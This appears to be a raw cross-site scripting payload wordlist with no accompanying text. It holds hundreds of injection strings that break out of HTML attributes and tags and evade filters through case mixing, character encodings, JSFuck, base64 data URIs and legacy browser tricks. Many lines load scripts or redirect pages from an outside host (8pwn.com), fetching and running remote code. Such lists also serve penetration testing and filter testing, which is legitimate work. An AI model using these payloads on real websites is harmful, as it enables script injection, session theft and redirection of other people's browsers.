'><a href="invalid:1" id=x name=y>test</a><a href="invalid:2" id=x name=y>test</a><script>alert(x.y[0])</script>
<script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>
</ScrIpt><script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>
"><script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>
</ScrIpt><script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>
'><script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>
</ScrIpt><script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>
<a href=1 name=x>test</a><a href=1 name=x>test</a><script>alert(x.removeChild)alert(x.parentNode)</script>
"><a href=1 name=x>test</a><a href=1 name=x>test</a><script>alert(x.removeChild)alert(x.parentNode)</script>
'><a href=1 name=x>test</a><a href=1 name=x>test</a><script>alert(x.removeChild)alert(x.parentNode)</script>
<a href="123" id=x>test</a><script>x='javascript:alert(1)';</script>
"><a href="123" id=x>test</a><script>x='javascript:alert(1)';</script>
'><a href="123" id=x>test</a><script>x='javascript:alert(1)';</script>
<form name=self location="javascript:alert(1)"
"><form name=self location="javascript:alert(1)"
'><form name=self location="javascript:alert(1)">
"><form name=self location="javascript:alert(1)"
"><form name=self location="javascript:alert(1)"
'><form name=self location="javascript:alert(1)">
'><form name=self location="javascript:alert(1)"
"><form name=self location="javascript:alert(1)"
'><form name=self location="javascript:alert(1)"></form><script>if(top!=self){top.location=self.location}</script>
"><form name=self location="javascript:alert(1)"></form><script>if(top!=self){top.location=self.location}</script>
'><form name=self location="javascript:alert(1)"></form><script>if(top!=self){top.location=self.location}</script>
<form name=self location="javascript&amp;#58;alert(1)"></form><script>if(top!=self){top.location=self.location}</script>
"><form name=self location="javascript&amp;#58;alert(1)"></form><script>if(top!=self){top.location=self.location}</script>
'><form name=self location="javascript&amp;#58;alert(1)"></form><script>if(top!=self){top.location=self.location}</script>
%3Cimg%20name%3DgetElementsByTagName%20src%3D1%20%20onerror%3Dalert(1)%3E
%3Cform%20onmouseover%3Dalert(1)%3E%3Cinput%20name%3Dattributes%3E
<a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x31\x29\x3B'>X
"><a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x31\x29\x3B'>X
'><a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x31\x29\x3B'>X
data:text/html,%3Cscript%3Ealert(1)%3C%2Fscript%3E
window.name//'name="javascript:alert("X")
<svg/onload=location=/java/.source+/script/.source+location.h ash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.has h[3]//#:()
"><svg/onload=location=/java/.source+/script/.source+location.h ash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.has h[3]//#:()
'><svg/onload=location=/java/.source+/script/.source+location.h ash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.has h[3]//#:()
<%div%20style=xss:expression(prompt(1))>
"><%div%20style=xss:expression(prompt(1))>
'><%div%20style=xss:expression(prompt(1))>
%22]);}catch(e){}if(!self.a)self.a=!alert(1);/
<script>alert(1)</script>
</ScrIpt><script>alert(1)</script>
"><script>alert(1)</script>
</ScrIpt><script>alert(1)</script>
'><script>alert(1)</script>
</ScrIpt><script>alert(1)</script>;
</ScrIpt><script>alert(1)</script>;
"><script>alert(1)</script>;
</ScrIpt><script>alert(1)</script>;
'><script>alert(1)</script>;
</ScrIpt><script>alert(1)</script>;
<script>alert("/X"/)</script>
</ScrIpt><script>alert("/X"/)</script>
"><script>alert("/X"/)</script>
</ScrIpt><script>alert("/X"/)</script>
'><script>alert("/X"/)</script>
</ScrIpt><script>alert("/X"/)</script>
<SCRIPT>a=/X/
</ScrIpt><SCRIPT>a=/X/
"><SCRIPT>a=/X/
</ScrIpt><SCRIPT>a=/X/
'><SCRIPT>a=/X/
</ScrIpt><SCRIPT>a=/X/\nalert(1);</SCRIPT>
</ScrIpt><SCRIPT>a=/X/
</ScrIpt><SCRIPT>a=/X/
"><SCRIPT>a=/X/
</ScrIpt><SCRIPT>a=/X/
'><SCRIPT>a=/X/
</ScrIpt><SCRIPT>a=/X/\nalert(1);</SCRIPT>
"><SCRIPT>a=/X/
</ScrIpt><SCRIPT>a=/X/
"><SCRIPT>a=/X/
</ScrIpt><SCRIPT>a=/X/
'><SCRIPT>a=/X/
</ScrIpt><SCRIPT>a=/X/\nalert(1);</SCRIPT>
</ScrIpt><SCRIPT>a=/X/
</ScrIpt><SCRIPT>a=/X/
"><SCRIPT>a=/X/
</ScrIpt><SCRIPT>a=/X/
'><SCRIPT>a=/X/
</ScrIpt><SCRIPT>a=/X/\nalert(1);</SCRIPT>
'><SCRIPT>a=/X/
</ScrIpt><SCRIPT>a=/X/
"><SCRIPT>a=/X/
</ScrIpt><SCRIPT>a=/X/
'><SCRIPT>a=/X/
</ScrIpt><SCRIPT>a=/X/\nalert(1);</SCRIPT>
</ScrIpt><SCRIPT>a=/X/
</ScrIpt><SCRIPT>a=/X/
"><SCRIPT>a=/X/
</ScrIpt><SCRIPT>a=/X/
'><SCRIPT>a=/X/
</ScrIpt><SCRIPT>a=/X/\nalert(1);</SCRIPT>
<script>alert([!![]]+[])</script>
</ScrIpt><script>alert([!![]]+[])</script>
"><script>alert([!![]]+[])</script>
</ScrIpt><script>alert([!![]]+[])</script>
'><script>alert([!![]]+[])</script>
</ScrIpt><script>alert([!![]]+[])</script>
<script>prompt(-[])</script>
</ScrIpt><script>prompt(-[])</script>
"><script>prompt(-[])</script>
</ScrIpt><script>prompt(-[])</script>
'><script>prompt(-[])</script>
</ScrIpt><script>prompt(-[])</script>
<scr/**/ipt>alert(1)</sc/**/ipt>
"><scr/**/ipt>alert(1)</sc/**/ipt>
'><scr/**/ipt>alert(1)</sc/**/ipt>
#<script>alert(1)</script>
</ScrIpt><script>alert(1)</script>
"><script>alert(1)</script>
</ScrIpt><script>alert(1)</script>
'><script>alert(1)</script>
</ScrIpt><script>alert(1)</script>
\'><script>X<\/script>
\'><body onload=\'X\'>
><script>X<\/script>
<body onload="X">
"><body onload="X">
'><body onload="X">
<img src="x:X" onerror="alert(1)">
"><img src="x:X" onerror="alert(1)">
'><img src="x:X" onerror="alert(1)">
<img src=a onerror=alert(1)
"><img src=a onerror=alert(1)
'><img src=a onerror=alert(1)%0A>a
"><img src=a onerror=alert(1)%0A>a
'><img src=a onerror=alert(1)%0A>a
onmouseover=alert(1);
<<SCRIPT>alert(1);/
"><<SCRIPT>alert(1);/
'><<SCRIPT>alert(1);/
<SCRIPT>a=/X/
</ScrIpt><SCRIPT>a=/X/
"><SCRIPT>a=/X/
</ScrIpt><SCRIPT>a=/X/
'><SCRIPT>a=/X/
</ScrIpt><SCRIPT>a=/X/
alert(1)
alert(String.fromCharCode(49))
alert(/1/.source)
eval('alert(1)')
this['EvAL'.toLowerCase()]('aLErT(1)'.toLowerCase())
(alert(1)).replace(/.+/,eval);
\u0061\u006c\u0065\u0072\u0074(1)
eval('\u00' + '6' + '1'+'le' + '\u0072' + 't(1)')
eval('\141\154\145\162\164\50\61\51')
eval('\x61\x6c\x65\x72\x74(1)')
eval('\x61ler\x74(1)')
top['a\x6Cert'](1)
x='\x61\x6c\x65\x72\x74\x28\x31\x29';new Function(x)()
setTimeout('alert(1)',0)
setTimeout(\u0061\u006c\u0065\u0072\u0074(1),0);
onerror=eval;throw'alert\x281\x29';
expression(URL=0)
expr\65 ssion(URL=0)
expr\65 ss/*???*/ion(URL=0);
expression\28URL=0\29
expr\65 ss/*\&#x25;/ion\28URL=0\29
\000045xpr\000065 ss/*BlABl/\\aaaaa!!!*
feed:javascript:alert(1)
feed:javascript&colon;alert(1)
feed:data:text/html,%3cscript%3ealert%281%29%3c/script%3e
feed:data:text/html,%3csvg%20onload=alert%281%29%3e
data:text/html,%3Cscript%3Ealert(1)%3C/script%3E
d&#x61;t&#x61;&colon;text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==
data:_;;;:;base64_______,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==
<LAYER SRC="javascript:alert(1);"></LAYER>
"><LAYER SRC="javascript:alert(1);"></LAYER>
'><LAYER SRC="javascript:alert(1);"></LAYER>
<LINK REL="stylesheet" HREF="javascript:alert(1);">
"><LINK REL="stylesheet" HREF="javascript:alert(1);">
'><LINK REL="stylesheet" HREF="javascript:alert(1);">
<!--[if gte IE 4]><SCRIPT>alert(1);</SCRIPT>
</ScrIpt><SCRIPT>alert(1);</SCRIPT>
"><SCRIPT>alert(1);</SCRIPT>
</ScrIpt><SCRIPT>alert(1);</SCRIPT>
'><SCRIPT>alert(1);</SCRIPT>
</ScrIpt><SCRIPT>alert(1);</SCRIPT><![endif]-->
"><!--[if gte IE 4]><SCRIPT>alert(1);</SCRIPT>
</ScrIpt><SCRIPT>alert(1);</SCRIPT>
"><SCRIPT>alert(1);</SCRIPT>
</ScrIpt><SCRIPT>alert(1);</SCRIPT>
'><SCRIPT>alert(1);</SCRIPT>
</ScrIpt><SCRIPT>alert(1);</SCRIPT><![endif]-->
'><!--[if gte IE 4]><SCRIPT>alert(1);</SCRIPT>
</ScrIpt><SCRIPT>alert(1);</SCRIPT>
"><SCRIPT>alert(1);</SCRIPT>
</ScrIpt><SCRIPT>alert(1);</SCRIPT>
'><SCRIPT>alert(1);</SCRIPT>
</ScrIpt><SCRIPT>alert(1);</SCRIPT><![endif]-->
<BASE HREF="javascript:alert(1);//">
"><BASE HREF="javascript:alert(1);//">
'><BASE HREF="javascript:alert(1);//">
data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==
<script>alert(String.fromCharCode(75,67,70))</script>
</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>
"><script>alert(String.fromCharCode(75,67,70))</script>
</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>
'><script>alert(String.fromCharCode(75,67,70))</script>
</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>
<IFRAME SRC="javascript:alert(1);"></IFRAME>
"><IFRAME SRC="javascript:alert(1);"></IFRAME>
'><IFRAME SRC="javascript:alert(1);"></IFRAME>
<iframe src="javascript:alert(1); <
"><iframe src="javascript:alert(1); <
'><iframe src="javascript:alert(1); <
<object data="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="></object>
"><object data="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="></object>
'><object data="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="></object>
<SCRIPT>x=/X/  alert(x.source)</SCRIPT>
</ScrIpt><SCRIPT>x=/X/  alert(x.source)</SCRIPT>
"><SCRIPT>x=/X/  alert(x.source)</SCRIPT>
</ScrIpt><SCRIPT>x=/X/  alert(x.source)</SCRIPT>
'><SCRIPT>x=/X/  alert(x.source)</SCRIPT>
</ScrIpt><SCRIPT>x=/X/  alert(x.source)</SCRIPT>
<BODY ONLOAD=alert(1)>
"><BODY ONLOAD=alert(1)>
'><BODY ONLOAD=alert(1)>
<ScRiPt+>prompt(1)</ScRiPt>
"><ScRiPt+>prompt(1)</ScRiPt>
'><ScRiPt+>prompt(1)</ScRiPt>
<img src=X onerror=alert(1)>
"><img src=X onerror=alert(1)>
'><img src=X onerror=alert(1)>
<img src=/ onerror=alert(1);>
"><img src=/ onerror=alert(1);>
'><img src=/ onerror=alert(1);>
<BODY BACKGROUND="javascript:alert(1)">
"><BODY BACKGROUND="javascript:alert(1)">
'><BODY BACKGROUND="javascript:alert(1)">
<TABLE BACKGROUND="javascript:alert(1)">
"><TABLE BACKGROUND="javascript:alert(1)">
'><TABLE BACKGROUND="javascript:alert(1)">
<IMG SRC='vbscript:msgbox(1)'>
"><IMG SRC='vbscript:msgbox(1)'>
'><IMG SRC='vbscript:msgbox(1)'>
<ScriPt>ALeRt(? X ?)</scriPt>
</ScrIpt><ScriPt>ALeRt(? X ?)</scriPt>
"><ScriPt>ALeRt(? X ?)</scriPt>
</ScrIpt><ScriPt>ALeRt(? X ?)</scriPt>
'><ScriPt>ALeRt(? X ?)</scriPt>
</ScrIpt><ScriPt>ALeRt(? X ?)</scriPt>
<a href="javascript#alert(1);">
"><a href="javascript#alert(1);">
'><a href="javascript#alert(1);">
<div onmouseover="alert(1);">
"><div onmouseover="alert(1);">
'><div onmouseover="alert(1);">
<BR SIZE="&{alert(1)}">
"><BR SIZE="&{alert(1)}">
'><BR SIZE="&{alert(1)}">
&<script>alert(1);</script>
</ScrIpt><script>alert(1);</script>
"><script>alert(1);</script>
</ScrIpt><script>alert(1);</script>
'><script>alert(1);</script>
</ScrIpt><script>alert(1);</script>
&{alert(1);};
<img src=&{alert(1);};>
"><img src=&{alert(1);};>
'><img src=&{alert(1);};>
<img src="mocha:alert(1);">
"><img src="mocha:alert(1);">
'><img src="mocha:alert(1);">
<img src="livescript:alert(1);">
"><img src="livescript:alert(1);">
'><img src="livescript:alert(1);">
<a href="about:<script>alert(1);</script>
</ScrIpt><script>alert(1);</script>
"><script>alert(1);</script>
</ScrIpt><script>alert(1);</script>
'><script>alert(1);</script>
</ScrIpt><script>alert(1);</script>">
[\xC0][\xBC]script>alert(1);[\xC0][\xBC]/script>" };
<object classid="clsid:..." codebase="javascript:alert(1);">
"><object classid="clsid:..." codebase="javascript:alert(1);">
'><object classid="clsid:..." codebase="javascript:alert(1);">
<style><!--</style><script>alert(1);//--></script>
"><style><!--</style><script>alert(1);//--></script>
'><style><!--</style><script>alert(1);//--></script>
<![CDATA[<!--]]<script>alert(1);//--></script>
"><![CDATA[<!--]]<script>alert(1);//--></script>
'><![CDATA[<!--]]<script>alert(1);//--></script>
<!-- -- --><script>alert(1);</script>
</ScrIpt><script>alert(1);</script>
"><script>alert(1);</script>
</ScrIpt><script>alert(1);</script>
'><script>alert(1);</script>
</ScrIpt><script>alert(1);</script><!-- -- -->
javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img -/style=a:expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"
<EMBED SRC="http://8pwn.com/xss_serve_payloads/flash.swf"></EMBED>
"><EMBED SRC="http://8pwn.com/xss_serve_payloads/flash.swf"></EMBED>
'><EMBED SRC="http://8pwn.com/xss_serve_payloads/flash.swf"></EMBED>
<img src="http://8pwn.com/xss_serve_payloads/image.png" onerror=alert(1)>
"><img src="http://8pwn.com/xss_serve_payloads/image.png" onerror=alert(1)>
'><img src="http://8pwn.com/xss_serve_payloads/image.png" onerror=alert(1)>
<img src="http://8pwn.com/xss_serve_payloads/gif.gif" onerror=alert(1)>
"><img src="http://8pwn.com/xss_serve_payloads/gif.gif" onerror=alert(1)>
'><img src="http://8pwn.com/xss_serve_payloads/gif.gif" onerror=alert(1)>
<img src="http://8pwn.com/xss_serve_payloads/bmp.bmp" onerror=alert(1)>
"><img src="http://8pwn.com/xss_serve_payloads/bmp.bmp" onerror=alert(1)>
'><img src="http://8pwn.com/xss_serve_payloads/bmp.bmp" onerror=alert(1)>
<img src="http://8pwn.com/xss_serve_payloads/jpg.jpg" onerror=alert(1)>
"><img src="http://8pwn.com/xss_serve_payloads/jpg.jpg" onerror=alert(1)>
'><img src="http://8pwn.com/xss_serve_payloads/jpg.jpg" onerror=alert(1)>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://8pwn.com/xss_serve_payloads/X.html">
"><meta HTTP-EQUIV="REFRESH" content="0; url=http://8pwn.com/xss_serve_payloads/X.html">
'><meta HTTP-EQUIV="REFRESH" content="0; url=http://8pwn.com/xss_serve_payloads/X.html">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
'><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
'><META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
<BGSOUND SRC="javascript:alert(1);">
"><BGSOUND SRC="javascript:alert(1);">
'><BGSOUND SRC="javascript:alert(1);">
<script type="text/javascript">window.open("http://8pwn.com/xss_serve_payloads/X.html","_self");</script>
"><script type="text/javascript">window.open("http://8pwn.com/xss_serve_payloads/X.html","_self");</script>
'><script type="text/javascript">window.open("http://8pwn.com/xss_serve_payloads/X.html","_self");</script>
<SCRIPT =">" SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
"><SCRIPT =">" SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
'><SCRIPT =">" SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
<SCRIPT a=">" SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
"><SCRIPT a=">" SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
'><SCRIPT a=">" SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
"><SCRIPT a=">" '' SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
'><SCRIPT a=">" '' SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
"><SCRIPT "a='>'" SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
'><SCRIPT "a='>'" SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
"><SCRIPT a=`>` SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
'><SCRIPT a=`>` SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
"><SCRIPT a=">'>" SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
'><SCRIPT a=">'>" SRC="http://8pwn.com/xss_serve_payloads/X.js"></SCRIPT>
<SCRIPT =">" SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
"><SCRIPT =">" SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
'><SCRIPT =">" SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
<SCRIPT a=">" SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
"><SCRIPT a=">" SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
'><SCRIPT a=">" SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
<SCRIPT a=">" '' SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
"><SCRIPT a=">" '' SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
'><SCRIPT a=">" '' SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
<SCRIPT "a='>'" SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
"><SCRIPT "a='>'" SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
'><SCRIPT "a='>'" SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
<SCRIPT a=`>` SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
"><SCRIPT a=`>` SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
'><SCRIPT a=`>` SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
<SCRIPT a=">'>" SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
"><SCRIPT a=">'>" SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
'><SCRIPT a=">'>" SRC="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></SCRIPT>
<TABLE><TD BACKGROUND="javascript:alert(1)">
"><TABLE><TD BACKGROUND="javascript:alert(1)">
'><TABLE><TD BACKGROUND="javascript:alert(1)">
<img src='http://8pwn.com/xss_serve_payloads/gif.gif' onload='document.scripts(0).src="http://8pwn.com/xss_serve_payloads/bmpz.bmp"'>
"><img src='http://8pwn.com/xss_serve_payloads/gif.gif' onload='document.scripts(0).src="http://8pwn.com/xss_serve_payloads/bmpz.bmp"'>
'><img src='http://8pwn.com/xss_serve_payloads/gif.gif' onload='document.scripts(0).src="http://8pwn.com/xss_serve_payloads/bmpz.bmp"'>
<img src='http://8pwn.com/xss_serve_payloads/gif.gif' onload='document.scripts(0).src="http://8pwn.com/xss_serve_payloads/X.js"'>
"><img src='http://8pwn.com/xss_serve_payloads/gif.gif' onload='document.scripts(0).src="http://8pwn.com/xss_serve_payloads/X.js"'>
'><img src='http://8pwn.com/xss_serve_payloads/gif.gif' onload='document.scripts(0).src="http://8pwn.com/xss_serve_payloads/X.js"'>
<img src='http://8pwn.com/xss_serve_payloads/xxxgif.gif' onerror='document.scripts(0).src="http://8pwn.com/xss_serve_payloads/X.js"'>
"><img src='http://8pwn.com/xss_serve_payloads/xxxgif.gif' onerror='document.scripts(0).src="http://8pwn.com/xss_serve_payloads/X.js"'>
'><img src='http://8pwn.com/xss_serve_payloads/xxxgif.gif' onerror='document.scripts(0).src="http://8pwn.com/xss_serve_payloads/X.js"'>
<img src='http://8pwn.com/xss_serve_payloads/xxxgif.gif' onerror='document.scripts(0).src="http://8pwn.com/xss_serve_payloads/bmpz.bmp"'>
"><img src='http://8pwn.com/xss_serve_payloads/xxxgif.gif' onerror='document.scripts(0).src="http://8pwn.com/xss_serve_payloads/bmpz.bmp"'>
'><img src='http://8pwn.com/xss_serve_payloads/xxxgif.gif' onerror='document.scripts(0).src="http://8pwn.com/xss_serve_payloads/bmpz.bmp"'>
<img src='http://8pwn.com/xss_serve_payloads/X.html' onload=alert(1)//></img>
"><img src='http://8pwn.com/xss_serve_payloads/X.html' onload=alert(1)//></img>
'><img src='http://8pwn.com/xss_serve_payloads/X.html' onload=alert(1)//></img>
<script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>
</ScrIpt><script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>
"><script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>
</ScrIpt><script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>
'><script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>
</ScrIpt><script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>
<img src=&#106;&#97;&#118;&#97;&#115;&#99; &#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101; &#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
"><img src=&#106;&#97;&#118;&#97;&#115;&#99; &#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101; &#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
'><img src=&#106;&#97;&#118;&#97;&#115;&#99; &#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101; &#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69 &#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27 &#x58&#x53&#x53&#x27&#x29>
"><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69 &#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27 &#x58&#x53&#x53&#x27&#x29>
'><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69 &#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27 &#x58&#x53&#x53&#x27&#x29>
<img src=&#0000106&#0000097&#0000118&#0000097 &#0000115&#0000099&#0000114&#0000105&#0000112 &#0000116&#0000058&#0000097&#0000108&#0000101 &#0000114&#0000116&#0000040&#0000039&#0000088 &#0000083&#0000083&#0000039&#0000041>
"><img src=&#0000106&#0000097&#0000118&#0000097 &#0000115&#0000099&#0000114&#0000105&#0000112 &#0000116&#0000058&#0000097&#0000108&#0000101 &#0000114&#0000116&#0000040&#0000039&#0000088 &#0000083&#0000083&#0000039&#0000041>
'><img src=&#0000106&#0000097&#0000118&#0000097 &#0000115&#0000099&#0000114&#0000105&#0000112 &#0000116&#0000058&#0000097&#0000108&#0000101 &#0000114&#0000116&#0000040&#0000039&#0000088 &#0000083&#0000083&#0000039&#0000041>
?><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
"><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
'><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
?><script>alert(String.fromCharCode(75,67,70))</script>
</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>
"><script>alert(String.fromCharCode(75,67,70))</script>
</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>
'><script>alert(String.fromCharCode(75,67,70))</script>
</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>
?><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
"><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
'><script>prompt(1)</script>
</ScrIpt><script>prompt(1)</script>
?><script>alert(String.fromCharCode(75,67,70))</script>
</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>
"><script>alert(String.fromCharCode(75,67,70))</script>
</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>
'><script>alert(String.fromCharCode(75,67,70))</script>
</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>
<ScRIPt>prompt(1)</ScRIPt>
</ScrIpt><ScRIPt>prompt(1)</ScRIPt>
"><ScRIPt>prompt(1)</ScRIPt>
</ScrIpt><ScRIPt>prompt(1)</ScRIPt>
'><ScRIPt>prompt(1)</ScRIPt>
</ScrIpt><ScRIPt>prompt(1)</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>
?><ScRIPt>prompt(1)</ScRIPt>
</ScrIpt><ScRIPt>prompt(1)</ScRIPt>
"><ScRIPt>prompt(1)</ScRIPt>
</ScrIpt><ScRIPt>prompt(1)</ScRIPt>
'><ScRIPt>prompt(1)</ScRIPt>
</ScrIpt><ScRIPt>prompt(1)</ScRIPt>
?><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>
?><ScRIPt>prompt(1)</ScRIPt>
</ScrIpt><ScRIPt>prompt(1)</ScRIPt>
"><ScRIPt>prompt(1)</ScRIPt>
</ScrIpt><ScRIPt>prompt(1)</ScRIPt>
'><ScRIPt>prompt(1)</ScRIPt>
</ScrIpt><ScRIPt>prompt(1)</ScRIPt>
?><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>
